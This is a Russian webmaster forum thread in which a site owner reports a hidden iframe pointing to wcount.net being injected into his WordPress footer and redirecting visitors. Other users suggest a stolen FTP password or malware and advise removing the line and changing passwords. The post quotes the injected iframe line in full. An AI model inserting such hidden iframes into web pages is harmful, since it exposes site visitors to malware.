- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте, Уважаемые форумчане. У меня появилась одна очень интересная проблема:
В файл WordPress'овской темы (очень часто это footer.php) дописывается строка <html><body><div style="display:none"><iframe src="http://wcount.net/com/index.php" width="320" height="240"></iframe></div></body></html>. Сначала все было не так уж и плохо: в футер дописывалась эта строка, я заходил в редактор темы и благополучно удалял эту ссылку на пару дней. Потом эта строка стала появляться все чаще, и чаще... Теперь вообще критическая ситуация: захожу на свой сайт www.vaz-tuning.info и меня перекидывает на сайт wcount.net. Я успеваю посмотреть html код главной страницы. В самом конце кода, уже после закрывающего тега </html> в футере стоит та строка, про которую я писал чуть выше. Но все дело в том, что в редакторе тем я благополучно захожу в редактирование футера, и... и не вижу этой строки. Ее там нет! Не знаю что делать, я в панике:(
Да, кстати, не только на этом сайте такое. Все 3 сайта, которые на моем аккаунте находятся, имеют такую же проблему. Подскажи пожалуйста, может кто-нибудь с этим сталкивался?
Заранее спасибо!
С Уважением, Милованов Юрий.
и не вижу этой строки. Ее там нет! Не знаю что делать, я в панике
А она не должна быть похожей на эту. Там должно быть что-то типа:
Может быть в index.php или в других файлах. Находите, удаляете, меняете пароли на FTP и больше не сохраняете пароль в FTP менеджере.
UPD: У Вас хоть какой то антивирус установлен? :) А то я пробовал зайти на сайт с установленным KIS 7 и с Avast - с любым не заходит из-за перенаправления на вирус.
У вас вероятнее всего спёрли пароль на фтп, или вы использовали ифрейм партнёрки. Удаляете эту строку во всех индексных файлах (index) которые есть у вас на хостинге. И конечно же поменяйте пароль на фтп.
У вас вероятнее всего спёрли пароль на фтп,
Или вирусы на сервере. Недавно аналогичную ситуацию на МТ обсуждали. Рекомендую: мастерталк.ru/topic82844s0.html?p=750442. Первый пост на второй странице (от spinne) будет особенно полезен новичкам в сереверных делах и любителей установки ЦМС "от хостера".
2 варианта:
1. Вирусняк или троян у вас на компе, нашёл адрес и пароль от ФТП и пишет туда гадость - проверяйте машину на вирусы.
2. Вирус у хостера. Отпишите хостеру или смените его на другого.
В любом случае, поменяйте пароли на ФТП.
Рекомендую: мастерталк.ru/topic82844s0.html?p=750442.
Рекомендую делать нормальные активные ссылки.
Рекомендую делать нормальные активные ссылки.
1. Не думаю, что модерам понравятся линки на "конкурентов" ;)
2. Здесь же не форум блондинок. Уверен, все в состоянии сделать правильный урл. (кто не в состоянии - тому не место на форуме посковых систем)
А я вот думаю им все равно.
А дело не в том. Есть такое понятие как удобство, ссылки для того и существуют, чтоб их нажать можно было.
1. Не думаю, что модерам понравятся линки на "конкурентов" ;)
2. Здесь же не форум блондинок. Уверен, все в состоянии сделать правильный урл. (кто не в состоянии - тому не место на форуме посковых систем)
1. не понравятся модерам ссылки - таки тему прибьют)
не вам домысливать за модеров-то))
2. главное - экономия чужого времени.
вы мое время сэкономили положив прямой урл - я вам респект и уважуха)
а если думаете что я не блондинка... то хоть оно и так) - но уже анреспект и неуважуха...
зачем чужое время тратить??
DocWeb, RaftKorn, Psycho и все остальные прошу меня простить за то, что показав полезный (на мой взгляд) урл я доставил вам массу неудобств. 🙅 🙅 🙅
😂
<script>....</script>
Как раз там вообще ничего нет. При просмотре хтмл кода на главной странице сайта, та строка есть, а когда захожу в редактирование футера, то там вообще ничего нет! Вопрос такой: может быть какой-то вирус вне темы WP, который сам добавляет эту сроку лишь при просмотре веб-страницы? У меня кстати на всех 3 сайтах такое.